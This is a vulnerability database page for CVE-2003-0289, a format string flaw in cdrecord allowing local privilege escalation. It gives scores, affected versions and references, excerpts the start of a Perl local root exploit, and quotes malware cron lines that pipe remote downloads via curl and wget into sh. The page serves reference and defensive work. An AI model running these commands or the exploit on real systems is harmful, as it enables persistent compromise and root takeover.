Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.2
CVSSv2

CVE-2003-0289

Published: 16/06/2003 Updated: 11/07/2017
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 730
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Cdrecord

Vulnerability Summary

Format string vulnerability in scsiopen.c of the cdrecord program in cdrtools 2.0 allows local users to gain privileges via format string specifiers in the dev parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

cdrtools cdrecord 2.0

cdrtools cdrecord 1.11

Exploits

Exploit DB: CDRTools CDRecord 2.0 (Mandrake / Slackware) - Local Privilege Escalation
#!/usr/bin/perl ########################################################### # Cdrecord version 20 and < local root exploit # # # [wsxz@localhost buffer]$ perl priv8cdrpl 4 # Using target number 4 # Using Mr dtors 0x808c82c # Cdrecord 20 (i586-mandrake-linux-gnu) # # scsibus: -1 target: -1 lun: -1 # Warning: Open by 'devname' is ...
Exploit DB: CDRTools CDRecord 1.11/2.0 - Devname Format String
source: wwwsecurityfocuscom/bid/7565/info CDRecord has been reported prone to a format string vulnerability The issue presents itself due to a programming error that occurs when calling a printf-like function It has been reported that by harnessing an unsupported feature of the CDRecord utility, an attacker may supply format string spe ...

Github Repositories

https://github.com/hongdal/notes

notes of scripts

VirusShare_775b04d9458a409e82ef05fb1b3dcc95sh Summary This script stops any firewalls, configures DNS server as 8888 Then, it sets /var/spool/cron/root to execute specific command The commands are: "*/5 * * * * curl -fsSL 18524425191/ish | sh" */5 * * * * wget -q -O- 18524425191/ish | sh Then, it cre

References

NVD-CWE-Otherhttp://www.securityfocus.com/bid/7565ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gzhttp://www.securiteam.com/exploits/5ZP0C2AAAC.htmlhttp://forums.gentoo.org/viewtopic.php?t=54904http://www.mandriva.com/security/advisories?name=MDKSA-2003:058http://marc.info/?l=bugtraq&m=105286031812533&w=2http://marc.info/?l=bugtraq&m=105285564307225&w=2https://exchange.xforce.ibmcloud.com/vulnerabilities/12007https://nvd.nist.govhttps://github.com/hongdal/noteshttps://www.exploit-db.com/exploits/31/
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4946CVE-2024-30309CVE-2024-4761CVE-2024-30051type confusionmemory leakCVE-2024-30293reflected XSSCVE-2024-3126
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook